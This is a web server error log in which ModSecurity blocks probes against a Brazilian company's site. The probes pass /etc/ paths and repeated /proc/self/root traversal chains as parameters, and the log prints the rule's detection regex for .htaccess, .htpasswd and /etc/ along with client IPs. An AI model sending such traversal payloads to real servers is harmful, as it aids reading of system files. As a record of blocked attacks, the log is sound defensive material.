[Fri Mar 20 10:54:45.827170 2026] [:error] [pid 7235:tid 140411607643904] [client 216.73.216.191:52304] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1RpfqxLDW4GITHUkQO4AAAARA"]
[Fri Mar 20 10:54:51.141998 2026] [mime_magic:error] [pid 9818:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:52664] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:54:56.639325 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.17:52978] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RsBCii7xarUs8iHaPpAAAAgY"]
[Fri Mar 20 10:55:02.850000 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:39042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1RtjJ3M9BSuKP7CAZKQAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:55:05.983562 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.91:53228] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1RufXLqtnMIWvjpaLAuwAAAoE"]
[Fri Mar 20 10:55:10.991272 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.54:53374] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1RvvqxLDW4GITHUkQO7QAAARE"]
[Fri Mar 20 10:55:19.465850 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:34850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1RxwF0L0L-SsrnPo6OJQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:55:22.055581 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:43588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ryrninkcc-iUj5AqC3gAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:55:46.690548 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:43590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1R4ta6ubjKNq_cu4b_0QAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 10:55:46.691139 2026] [:error] [pid 10189:tid 140411557287680] [client 57.141.18.119:54848] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1R4jJ3M9BSuKP7CAZKmAAAAJY"]
[Fri Mar 20 10:55:49.413816 2026] [:error] [pid 21219:tid 140411607643904] [client 216.73.216.191:55010] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R5fXLqtnMIWvjpaLA1wAAApA"]
[Fri Mar 20 10:55:50.451108 2026] [:error] [pid 7235:tid 140411632822016] [client 216.73.216.191:55098] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R5vqxLDW4GITHUkQPHQAAAQ0"]
[Fri Mar 20 10:55:55.279436 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.113:55422] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1R67ninkcc-iUj5AqC-gAAA4I"]
[Fri Mar 20 10:55:55.432393 2026] [:error] [pid 21219:tid 140411574073088] [client 216.73.216.191:55430] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1R6_XLqtnMIWvjpaLA4QAAApQ"]
[Fri Mar 20 10:55:55.504046 2026] [:error] [pid 9818:tid 140411582465792] [client 216.73.216.191:55436] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R611pVZ5mVmJwsFNU5AAAAFM"]
[Fri Mar 20 10:55:55.779059 2026] [:error] [pid 26799:tid 140411683178240] [client 216.73.216.191:55454] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R69a6ubjKNq_cu4b_3wAAA0c"]
[Fri Mar 20 10:55:55.935591 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.99:55460] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1R67ninkcc-iUj5AqC_AAAA5c"]
[Fri Mar 20 10:55:57.531513 2026] [:error] [pid 7235:tid 140411574073088] [client 216.73.216.191:55588] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R7fqxLDW4GITHUkQPJwAAARQ"]
[Fri Mar 20 10:55:59.599878 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.32:55650] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1R7uoXxyEfFpUF8f-lpAAAAVg"]
[Fri Mar 20 10:56:10.085409 2026] [:error] [pid 7235:tid 140411624429312] [client 204.12.208.18:60829] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/js11e544/index.php"] [unique_id "ab1R-vqxLDW4GITHUkQPKwAAAQ4"], referer: https://bandeirantesbombas.com.br/wp-content/js11e544/index.php
[Fri Mar 20 10:56:11.121851 2026] [:error] [pid 15826:tid 140411574073088] [client 216.73.216.191:56050] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R--oXxyEfFpUF8f-lsgAAAVQ"]
[Fri Mar 20 10:56:11.423529 2026] [:error] [pid 26799:tid 140411741927168] [client 216.73.216.191:56088] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R-9a6ubjKNq_cu4b_7wAAA0A"]
[Fri Mar 20 10:56:11.511626 2026] [:error] [pid 7893:tid 140411632822016] [client 216.73.216.191:56026] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1R-xCii7xarUs8iHaP5QAAAg0"]
[Fri Mar 20 10:56:12.235736 2026] [:error] [pid 31215:tid 140411699963648] [client 216.73.216.191:56148] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R_AF0L0L-SsrnPo6OTQAAAsU"]
[Fri Mar 20 10:56:13.335210 2026] [:error] [pid 21219:tid 140411624429312] [client 216.73.216.191:56236] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1R_fXLqtnMIWvjpaLA-AAAAo4"]
[Fri Mar 20 10:56:13.693869 2026] [:error] [pid 31215:tid 140411725141760] [client 216.73.216.191:56178] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1R_QF0L0L-SsrnPo6OUQAAAsI"]
[Fri Mar 20 10:56:15.795617 2026] [:error] [pid 21219:tid 140411607643904] [client 216.73.216.191:56402] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1R__XLqtnMIWvjpaLA-wAAApA"]
[Fri Mar 20 10:56:16.653166 2026] [:error] [pid 9818:tid 140411708356352] [client 216.73.216.191:56468] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SAF1pVZ5mVmJwsFNVAwAAAEQ"]
[Fri Mar 20 10:56:21.630775 2026] [:error] [pid 10189:tid 140411691570944] [client 216.73.216.191:56616] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1SBDJ3M9BSuKP7CAZKwQAAAIY"]
